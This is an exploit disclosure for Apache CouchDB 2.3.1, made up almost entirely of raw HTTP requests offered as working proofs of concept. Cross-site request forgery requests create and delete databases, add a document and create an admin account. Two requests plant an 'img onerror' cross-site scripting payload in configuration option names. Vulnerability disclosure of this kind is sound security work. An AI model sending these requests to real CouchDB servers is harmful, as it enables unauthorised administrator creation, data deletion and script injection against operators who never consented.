################################################################################################################################## # Exploit Title: Apache CouchDB 2.3.1 | Cross-Site Request Forgery / Cross-Site Scripting # Date: 22.03.2019 # Exploit Author: Ozer Goker # Vendor Homepage: http://couchdb.apache.org # Software Link: http://couchdb.apache.org/#download # Version: 2.3.1 ################################################################################################################################## Introduction A CouchDB server hosts named databases, which store documents. Each document is uniquely named in the database, and CouchDB provides a RESTful HTTP API for reading and updating (add, edit, delete) database documents. ################################################################################# Vulnerabilities: CSRF | XSS DOM Based & Reflected & Stored ################################################################################# CSRF1 Create Database PUT /test HTTP/1.1 Host: 127.0.0.1:5984 User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:65.0) Gecko/20100101 Firefox/65.0 Accept: application/json, text/javascript, */*; q=0.01 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://127.0.0.1:5984/_utils/ Content-Type: application/json X-Requested-With: XMLHttpRequest Content-Length: 27 DNT: 1 Connection: close Cookie: _ga=GA1.1.781615969.1550605249 {"id":"test","name":"test"} ################################################################################# CSRF2 Delete Database DELETE /test HTTP/1.1 Host: 127.0.0.1:5984 User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:65.0) Gecko/20100101 Firefox/65.0 Accept: application/json Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://127.0.0.1:5984/_utils/ content-type: application/json pragma: no-cache Origin: http://127.0.0.1:5984 DNT: 1 Connection: close Cookie: _ga=GA1.1.781615969.1550605249 Cache-Control: max-age=0 ################################################################################# CSRF3 Create Document POST /test/ HTTP/1.1 Host: 127.0.0.1:5984 User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:65.0) Gecko/20100101 Firefox/65.0 Accept: application/json, text/javascript, */*; q=0.01 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://127.0.0.1:5984/_utils/ Content-Type: application/json X-Requested-With: XMLHttpRequest Content-Length: 18 DNT: 1 Connection: close Cookie: _ga=GA1.1.781615969.1550605249 {"testdoc":"test"} ################################################################################# CSRF4 Create Admin PUT /_node/couchdb@localhost/_config/admins/admin HTTP/1.1 Host: 127.0.0.1:5984 User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:65.0) Gecko/20100101 Firefox/65.0 Accept: application/json Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://127.0.0.1:5984/_utils/ content-type: application/json pragma: no-cache Origin: http://127.0.0.1:5984 Content-Length: 10 DNT: 1 Connection: close Cookie: _ga=GA1.1.781615969.1550605249 Cache-Control: max-age=0 "password" ################################################################################# CSRF5 & XSS1 | DOM Based & Stored - Add Option PUT /_node/couchdb@localhost/_config/test/%3Cimg%20src%3Dx%20onerror%3Dalert(1)%3E HTTP/1.1 Host: 127.0.0.1:5984 User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:65.0) Gecko/20100101 Firefox/65.0 Accept: application/json Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://127.0.0.1:5984/_utils/ content-type: application/json pragma: no-cache Origin: http://127.0.0.1:5984 Content-Length: 6 DNT: 1 Connection: close Cookie: _ga=GA1.1.781615969.1550605249 Cache-Control: max-age=0 "test" ################################################################################# CSRF6 & XSS2 | DOM Based & Stored - Delete Option DELETE /_node/couchdb@localhost/_config/test/%3Cimg%20src%3Dx%20onerror%3Dalert(1)%3E HTTP/1.1 Host: 127.0.0.1:5984 User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:65.0) Gecko/20100101 Firefox/65.0 Accept: application/json Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://127.0.0.1:5984/_utils/ content-type: application/json pragma: no-cache Origin: http://127.0.0.1:5984 DNT: 1 Connection: close Cookie: _ga=GA1.1.781615969.1550605249 Cache-Control: max-age=0 #################################################################################